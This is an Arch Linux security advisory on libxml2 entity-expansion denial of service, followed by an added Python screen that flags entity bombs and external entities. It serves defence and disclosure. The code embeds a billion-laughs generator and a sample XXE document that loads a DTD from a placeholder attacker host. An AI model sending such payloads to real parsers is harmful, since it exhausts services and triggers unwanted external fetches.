[arch-security] [Arch Linux Security Advisory ASA-201410-12] libxml2: Denial of service

Levente Polyak anthraxx at archlinux.org
Fri Oct 24 22:15:08 UTC 2014


Arch Linux Security Advisory ASA-201410-12
==========================================

Severity: Medium
Date    : 2014-10-24
CVE-ID  : CVE-2014-0191, CVE-2014-3660
Package : libxml2
Type    : Denial of service
Remote  : Yes
Link    : https://wiki.archlinux.org/index.php/CVE-2014

Summary
=======

The package libxml2 before version 2.9.2-1 is vulnerable to denial of
service through entity expansion, even when the application has
disabled entity substitution.

Resolution
==========

Upgrade to 2.9.2-1.

# pacman -Syu "libxml2>=2.9.2-1"

The problems have been fixed upstream [0][1] in version 2.9.2.

Workaround
==========

None.

Description
===========

Daniel Berrange discovered that libxml2 incorrectly performs entity
substitution in the doctype prolog, even if the application using
libxml2 has disabled entity substitution. A remote attacker could
provide a specially crafted XML file that, when processed, leads to the
exhaustion of CPU and memory resources or file descriptors.

Impact
======

A remote attacker is able to exploit this vulnerability using a
specially crafted XML document containing malicious attributes to
consume all available CPU and memory resources or file descriptors.
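The Description and Impact above describe documents whose DTD makes the parser
do far more work than the document size suggests: nested entity references that
multiply on expansion, and external entities that cause a fetch even when the
caller asked for no substitution. The following example is added here and is
not libxml2 code or part of the advisory; it is a standard-library-only
pre-parse screen that reads the entity declarations of an untrusted document,
estimates how many bytes each general entity would expand to, and flags
recursive entities and SYSTEM/PUBLIC (external) entities before the document
reaches libxml2. The sample documents, the `attacker.example` host and the
1,000,000-byte threshold are constructed for the example. The advisory lists no
workaround; this screen only shows the shape of the inputs involved and is no
substitute for the upgrade.

```python
"""Pre-parse screen for entity-expansion bombs and external entities in XML.

Added example for ASA-201410-12; not libxml2 code. It scans the DTD with a
regular expression, so it is a heuristic for hostile input, not an XML parser.
"""
import re

# <!ENTITY [%] name ( "literal" | 'literal' | SYSTEM/PUBLIC ... ) >
ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[A-Za-z_:][\w.:-]*)\s+'
    r'(?:"(?P<dq>[^"]*)"|\'(?P<sq>[^\']*)\'|(?P<ext>(?:SYSTEM|PUBLIC)\b[^>]*))\s*>',
    re.S)
ENTITY_REF = re.compile(r'&([A-Za-z_:][\w.:-]*);')
# The five predefined entities expand to a single character each.
PREDEFINED = {'lt': 1, 'gt': 1, 'amp': 1, 'apos': 1, 'quot': 1}


def declared_entities(xml_text):
    """Return ({general entity name: literal}, [external entity names]).

    Parameter entities with literal values are ignored: they are only usable
    inside the DTD and cannot be referenced from document content.
    """
    general, external = {}, []
    for m in ENTITY_DECL.finditer(xml_text):
        name = ('%' if m.group('param') else '') + m.group('name')
        if m.group('ext') is not None:
            external.append(name)          # SYSTEM/PUBLIC: fetched from outside
        elif not m.group('param'):
            general[name] = m.group('dq') if m.group('dq') is not None else m.group('sq')
    return general, external


def expansion_size(name, general, memo, stack):
    """Bytes produced when &name; is fully expanded; inf on a reference cycle."""
    if name in memo:
        return memo[name]
    if name not in general:
        # Undeclared references are left as text by a non-substituting parser,
        # so count the reference itself; predefined ones become one character.
        return PREDEFINED.get(name, len(name) + 2)
    if name in stack:
        return float('inf')                # entity refers back to itself
    stack.add(name)
    literal, size, last = general[name], 0, 0
    for ref in ENTITY_REF.finditer(literal):
        size += ref.start() - last         # literal text before the reference
        size += expansion_size(ref.group(1), general, memo, stack)
        last = ref.end()
    size += len(literal) - last            # literal text after the last reference
    stack.discard(name)
    memo[name] = size
    return size


def audit(xml_text, max_expansion=1_000_000):
    """Return (finding, entity, detail) tuples; an empty list means no concern."""
    general, external = declared_entities(xml_text)
    findings = [('external entity', ent,
                 'would fetch a resource from outside the document') for ent in external]
    memo = {}
    for name in general:
        size = expansion_size(name, general, memo, set())
        if size == float('inf'):
            findings.append(('recursive entity', name, 'references itself'))
        elif size > max_expansion:
            findings.append(('entity bomb', name, f'expands to {size:,} bytes'))
    return findings


def billion_laughs(depth=9, fanout=10):
    """Constructed sample: the classic nested-entity document (3 * 10**depth bytes)."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = 'lol' if i == 1 else f'lol{i - 1}'
        decls.append(f'<!ENTITY lol{i} "{f"&{prev};" * fanout}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n  ' + '\n  '.join(decls)
            + f'\n]>\n<lolz>&lol{depth};</lolz>\n')


# Constructed sample: an external parameter entity (the attacker.example host is
# a placeholder), the pattern behind loading entities the caller never asked for.
XXE_DOC = '''<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  %remote;
]>
<doc>hello</doc>
'''
# Constructed sample: two entities that reference each other.
RECURSIVE_DOC = '<!DOCTYPE d [ <!ENTITY a "&b;"> <!ENTITY b "&a;"> ]><d>&a;</d>'
# Constructed sample: an ordinary internal entity, which should pass.
BENIGN_DOC = ('<?xml version="1.0"?>\n<!DOCTYPE note [ <!ENTITY author "Arch Linux"> ]>\n'
              '<note>&author; &amp; friends</note>\n')

if __name__ == '__main__':
    for label, doc in [('billion laughs', billion_laughs()), ('external entity', XXE_DOC),
                       ('recursive', RECURSIVE_DOC), ('benign', BENIGN_DOC)]:
        print(f'{label}: {audit(doc) or "no findings"}')
```

The expansion estimate is the point: the nine-level document is under 1 KiB on
disk but `&lol9;` expands to 3,000,000,000 bytes, which is the CPU and memory
exhaustion the advisory describes. The screen runs before libxml2 sees the
bytes, so it does not depend on the parser honouring its own no-substitution
setting, which is exactly the property the fixed versions restore.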

References
==========

[0] https://git.gnome.org/browse/libxml2/commit/?id=9cd1c
[1] https://git.gnome.org/browse/libxml2/commit/?id=be2a7
https://access.redhat.com/security/cve/CVE-2014-0191
https://access.redhat.com/security/cve/CVE-2014-3660
https://bugs.archlinux.org/task/40790
http://www.openwall.com/lists/oss-security/2014/05/06/4

